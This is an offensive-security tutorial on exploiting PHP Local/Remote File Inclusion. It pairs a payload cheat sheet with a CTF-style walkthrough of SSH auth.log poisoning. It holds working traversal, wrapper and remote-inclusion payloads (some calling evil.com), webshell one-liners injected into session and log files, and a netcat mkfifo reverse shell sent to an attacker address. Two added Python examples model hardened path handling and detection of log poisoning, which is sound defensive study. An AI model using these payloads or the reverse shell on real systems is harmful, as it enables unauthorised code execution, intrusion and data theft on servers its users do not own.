Exploiting Local/Remote File Inclusion
- 1 What is LFI / RFI?
- 2 Example: RCE through LFI via SSH Log Poisoning
What is LFI / RFI?
A Local/Remote File Inclusion (LFI/RFI) vulnerability lets an attacker abuse a web application's dynamic file-inclusion mechanism (typically something like include($_GET['page']) in PHP) to load files outside the intended scope: local files such as /etc/passwd, log files and session files in the LFI case, or resources fetched from an attacker-controlled server in the RFI case. Because included content is parsed as PHP, reading a file you can also write to turns the bug into remote code execution.
LFI / RFI Cheat Sheet
Directory traversal (vary the depth; the null byte only truncates on PHP < 5.3.4, and the trailing "..\.\.\.[ADD MORE]" padding relies on old PHP builds truncating over-long paths):
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
Remote inclusion (requires allow_url_include=On):
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
php://filter (returns the file's source instead of executing it, so it works with allow_url_include=Off; the wrapper name is case-insensitive):
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
expect:// (direct command execution; needs the PECL expect extension, which is rarely installed):
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
Uploaded files and the data: wrapper (data: requires allow_url_include=On):
http://example.com/index.php?page=path/to/uploaded/file.png
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
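Why the traversal variants above get past common filters is easier to see against a model of the code they target. The following is an added example, not code from the original page or from any real application: it mimics a PHP-style include($_GET['page'] . '.php') with the usual bad fixes (a single-pass "../" strip, a second URL decode before use, NUL-terminated C strings on PHP < 5.3.4) and puts a hardened allowlist version beside it. The include directory, the ".php" suffix and the traversal depth of the payloads are assumptions chosen for the illustration.

```python
"""
Added example (not from the original page): an offline model of the path
handling behind a PHP-style include($_GET['page'] . '.php'), so the
traversal payloads from the cheat sheet can be tried without a target.
PAGES_DIR, SUFFIX and the two "fixes" are assumptions for illustration.
"""
import posixpath
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

PAGES_DIR = "/var/www/html/pages"   # assumed include directory (four levels deep)
SUFFIX = ".php"                      # assumed: the app appends an extension before include()


def legacy_resolve(raw: str, strip_dotdot: bool = True) -> str:
    """Path a naively patched legacy include() would open for ?page=<raw>.

    raw is the parameter as sent on the wire (still URL-encoded). Each step
    mirrors a real-world mistake:
      1. PHP URL-decodes the query string once.
      2. A non-recursive blacklist strips "../" in a single pass.
      3. The app URL-decodes again before use (double-decode bug).
      4. A fixed extension is appended.
      5. PHP < 5.3.4 handed the string to C, which stops at the first NUL.
    """
    page = unquote(raw)                       # 1
    if strip_dotdot:
        page = page.replace("../", "")        # 2: "....//" survives as "../"
    page = unquote(page)                      # 3: "%2e%2e%2f" turns into "../" only now
    page = page + SUFFIX                      # 4
    page = page.split("\x00", 1)[0]           # 5: "%00" discards the suffix
    return posixpath.normpath(posixpath.join(PAGES_DIR, page))


SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def safe_resolve(page: str) -> Optional[str]:
    """Hardened form: allowlist the page name, then canonicalise and confirm
    the result still sits under PAGES_DIR. Takes the already-decoded value
    (what PHP's $_GET holds). Returns None to refuse the include. In PHP,
    run realpath() on both sides of the final comparison so symlinks are
    resolved as well."""
    if not SAFE_NAME.fullmatch(page):         # no '/', '.', ':', '%' or NUL survives this
        return None
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, page + SUFFIX))
    if not candidate.startswith(PAGES_DIR + "/"):   # defence in depth
        return None
    return candidate


# (label, wire value, whether the "../"-stripping fix is in place); traversal
# depth is chosen for the assumed PAGES_DIR. Constructed from the cheat sheet.
PAYLOADS: List[Tuple[str, str, bool]] = [
    ("no filter, plain",       "../../../../../etc/passwd",                    False),
    ("no filter, %00",         "../../../../../etc/passwd%00",                 False),
    ("strip ../, plain",       "../../../../../etc/passwd%00",                 True),
    ("strip ../, ....//",      "....//" * 5 + "etc/passwd%00",                 True),
    ("strip ../, double-enc",  "%252e%252e%252f" * 5 + "etc%252fpasswd%2500",  True),
    ("legit",                  "about",                                        True),
]


def run_all() -> Dict[str, Tuple[str, Optional[str]]]:
    """{label: (what the legacy include opens, what the hardened one opens)}."""
    return {label: (legacy_resolve(raw, strip), safe_resolve(unquote(raw)))
            for label, raw, strip in PAYLOADS}


if __name__ == "__main__":
    for label, (legacy, safe) in run_all().items():
        print(f"{label:24} legacy -> {legacy:36} hardened -> {safe}")
```

Running it shows the suffix alone defeating the plain payload (/etc/passwd.php does not exist), the null byte restoring it, the one-pass strip blocking ../ but not ....// or the double-encoded form, and the allowlist rejecting all of them while still serving "about". The lesson is that blacklisting spellings of "../" is a losing game; constrain the name to a safe character set and verify the canonical path.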
Exploit LFI through ZIP
Create a PHP payload (e.g. <?php system($_GET['cmd']); ?> saved as payload.php), zip it, and mask the archive as a file with a different, acceptable extension so it passes the upload filter:
zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php
Upload shell.jpg, then include the member through the zip:// wrapper, giving the archive's path on the server and %23 (a URL-encoded #) to separate the archive from the file inside it, e.g. page=zip://path/to/uploaded/shell.jpg%23payload.php&cmd=id
Exploit LFI / RCE via php://input
The php://input wrapper reads the raw body of the request, so send a POST with the PHP code as the body (use <?php rather than <? if short_open_tag is off; this wrapper counts as a URL wrapper for include and therefore needs allow_url_include=On):
http://example.com/index.php?page=php://input
POST body: <? system('whoami'); ?>
Exploit LFI / RCE via PHP Session
Check whether the website uses PHP sessions (a PHPSESSID cookie):
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-April-2018 00:21:29 EDT; path=/; httponly
With PHP5 on Debian-based systems these sessions are stored as /var/lib/php5/sess_[PHPSESSID] (PHP 7 typically uses /var/lib/php/sessions/). The file holds the serialized $_SESSION array, so whatever the application stores in the session lands on disk verbatim.
Inject your code through a value the application keeps in the session (here the user field of the login form), sending the request with your own PHPSESSID cookie:
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
Then include the session file that belongs to your cookie, e.g. page=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
Exploit LFI / RCE via Log file
Append PHP code to a log file the web server can read (use your imagination here: a User-Agent or Referer header for the Apache access log, a malformed request for the error log, a username for the FTP or SSH service logs), then include the log:
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
Keep the injected PHP short and syntactically valid: a parse error in the log breaks every later include of that file.
Exploit RFI wrapping DATA with "" payload
Exploit RFI through EXPECT
Example: RCE through LFI via SSH Log Poisoning
Let's assume your target system is running a flavour of Debian (e.g. Ubuntu) where login attempts are logged to /var/log/auth.log and that file is readable through the LFI. Note that on a stock install auth.log is owned by root:adm with mode 0640, so www-data cannot read it; the technique only works where permissions are looser or the application runs with more privileges than it should. Check first:
# curl -v -s -G --data-urlencode file=/var/log/auth.log http://192.168.56.106 | grep logind
...
May 9 04:54:33 hostname systemd-logind: New seat seat0
...
Good, we can read the log. Now let's try injecting some PHP into it. The code will execute a command and render its output as part of the response.
A word of caution: you have to be very careful here, because improperly formatted PHP will break the log in a way that makes it impossible to include any more, and you cannot remove what you have written. If you plan to inject a large amount of data, use the first working payload to create temporary files under /tmp and work with those instead, keeping auth.log as the fallback.
The quickest and shortest way to pass arbitrary commands to PHP is a system() call, injected into auth.log by attempting an SSH login with the code as the username (sshd records the rejected username verbatim in its "Invalid user" line). Quote the whole thing so the shell passes it through unchanged, and prefer the full <?php tag since the short <? form depends on short_open_tag:
# ssh '<?php system($_GET["cmd"]); ?>'@192.168.56.106
Now request the same URL again, passing a command such as ls, and the command's output appears as part of the response:
# curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode "cmd=ls -altr" http://192.168.56.106 | less
...
-rw-r--r-- 1 www-data root 42K Mar 5 09:33 index.php
-rw-r--r-- 1 www-data root 3.1K Mar 5 09:35 about.php
-rw-r--r-- 1 www-data root 89 Mar 5 09:36 _super_secret_file.txt
...
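A defender's view of the same procedure, as an added example that is not part of the original page: the first function spots the poison in an auth log, the second flags the LFI requests that fetch it from an Apache access log. The log lines are constructed to look like the ones this section produces, and the patterns, paths and IP addresses are assumptions.

```python
"""
Added example (not from the original page): detection logic for both sides
of log poisoning, run over constructed sample log lines (not real captures).
The regexes, the log layouts and every IP address are assumptions.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed /var/log/auth.log excerpt modelled on the ssh trick above:
# sshd records a rejected username verbatim in its "Invalid user ..." line.
AUTH_LOG = """\
May  9 04:54:33 hostname sshd[1234]: Accepted publickey for deploy from 192.168.56.1 port 50122 ssh2
May  9 04:55:01 hostname sshd[1240]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.56.200 port 49710
May  9 04:55:01 hostname sshd[1240]: Failed password for invalid user <?php system($_GET["cmd"]); ?> from 192.168.56.200 port 49710 ssh2
May  9 04:56:12 hostname sshd[1251]: Invalid user admin from 203.0.113.5 port 4022
"""

# Constructed Apache combined-format access log with the follow-up requests.
ACCESS_LOG = """\
192.168.56.200 - - [09/May/2018:04:57:02 +0000] "GET /?file=/var/log/auth.log&cmd=ls%20-altr HTTP/1.1" 200 4521 "-" "curl/7.58.0"
192.168.56.200 - - [09/May/2018:04:57:40 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1203 "-" "curl/7.58.0"
10.0.0.7 - - [09/May/2018:04:58:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
192.168.56.200 - - [09/May/2018:04:58:31 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 58000 "-" "curl/7.58.0"
"""

# A PHP open tag (<?php, <?= or the short "<?" followed by whitespace) or an
# execution sink has no business in an authentication log.
PHP_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)
PHP_SINK = re.compile(r"\b(?:system|exec|passthru|shell_exec|popen|eval|assert)\s*\(", re.IGNORECASE)

# LFI/RFI indicators in a request target: traversal (the "....//" spelling
# still contains a literal "../"), NUL truncation, stream wrappers, and
# direct reads of log or session paths.
LFI_INDICATORS = [
    (re.compile(r"\.\./|\.\.\\"), "traversal"),
    (re.compile(r"\x00"), "null-byte"),
    (re.compile(r"\b(?:php|expect|data|zip|phar|file)://", re.IGNORECASE), "wrapper"),
    (re.compile(r"/var/log/|/proc/self/|/sess_[0-9a-z]+", re.IGNORECASE), "sensitive-path"),
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def poisoned_lines(log_text: str) -> List[str]:
    """Auth-log lines that carry PHP code, i.e. the poison itself."""
    return [ln for ln in log_text.splitlines()
            if PHP_TAG.search(ln) or PHP_SINK.search(ln)]


def flag_requests(log_text: str) -> Dict[str, List[str]]:
    """Map each suspicious request target (as logged) to the indicators it
    trips. The target is URL-decoded twice so that %252e%252e%252f is
    caught as well as %2e%2e%2f."""
    flagged: Dict[str, List[str]] = {}
    for ln in log_text.splitlines():
        m = REQUEST_RE.search(ln)
        if not m:
            continue
        target = unquote(unquote(m.group(1)))
        hits = [name for rx, name in LFI_INDICATORS if rx.search(target)]
        if hits:
            flagged[m.group(1)] = hits
    return flagged


if __name__ == "__main__":
    for ln in poisoned_lines(AUTH_LOG):
        print("POISONED:", ln)
    for target, hits in flag_requests(ACCESS_LOG).items():
        print("LFI?", ", ".join(hits), "<-", target)
```

In the sample the two sshd lines from 192.168.56.200 are reported as poison and three of the four requests are flagged (the log read, the ....// traversal and the php://filter source disclosure), while the ordinary page=about request passes. Correlating the source address of the poisoned login attempt with the address issuing the LFI requests is what turns two weak signals into a confident detection.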
Dropping into a system shell
While it might sound very tempting, dropping into a shell is not always the best idea: the new process shows up immediately in the process list and may be picked up by an IDS (Intrusion Detection System) that monitors certain files and processes, or by anyone keeping an eye on the host, and that can trigger Incident Response.
For the sake of a CTF, however, this is not a big deal, so let's do it!
Term 1: Start nc in listening mode
root@kali:~# nc -vvvlt -p 4444
listening on [any] 4444 ...
Term 2: Execute the reverse shell command through the poisoned log
root@kali:~# curl -G --data-urlencode file=/var/log/auth.log --data-urlencode "cmd=rm -f /tmp/backpipe; mkfifo /tmp/backpipe; cat /tmp/backpipe | /bin/sh -i 2>&1 | nc 192.168.56.200 4444 >/tmp/backpipe" http://192.168.56.106
Term 1: Acknowledge the reverse shell connection and spawn a new tty so we can interact with it properly
root@kali:~# nc -vvvlt -p 4444
listening on [any] 4444 ...
connect to [192.168.56.200] from robot [192.168.56.108] 49714
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/var/www $